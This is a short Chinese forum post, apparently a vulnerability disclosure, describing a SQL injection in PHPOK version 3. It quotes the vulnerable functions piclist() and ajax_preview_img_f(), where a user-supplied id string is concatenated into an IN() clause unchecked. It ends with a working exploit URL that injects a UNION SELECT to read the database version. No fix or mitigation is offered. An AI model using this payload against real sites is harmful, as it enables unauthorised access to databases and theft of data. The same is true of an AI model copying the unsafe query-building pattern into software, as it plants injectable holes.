- 帖子
- 18
- 积分
- 33
- 威望
- 39
- 金钱
- 43
- 在线时间
- 2 小时
|
发布作者:jsbug
影响版本:V3
漏洞类型:SQL注入
漏洞描述:phpok3SQL注入漏洞
漏洞代码:
phpok3/app/www/models/upfile.php
//通过ID串获取图片信息,这里获取的带有ID的缩略图
function piclist($idstring="")
{
if(!$idstring)
{
return false;
}
$sql = "SELECT id,thumb url FROM ".$this->db->prefix."upfiles WHERE id IN(".$idstring.") ORDER BY substring_index('".$idstring."',id,1)";
echo($sql);
return $this->db->get_all($sql);
}
IN()这里的问题,有点类似当年的Dz5.0 pm.php漏洞
phpok3/app/www/control/open.php
//通过Ajax预览图片
function ajax_preview_img_f()
{
//这里只是为了防止跨站,并且过滤的不好
$idstring = $this->trans_lib->safe("idstring");
if(!$idstring)
{
exit("empty");
}
//直接代入
$rslist = $this->upfile_m->piclist($idstring);
sys_html2js($this->json_lib->encode($rslist));
}
有几个同类型的就不再赘述了。
附Exp:
http://localhost/phpok3/index.php?c=open&f=ajax_preview_img&idstring=0) union select 1,version()%23 |
|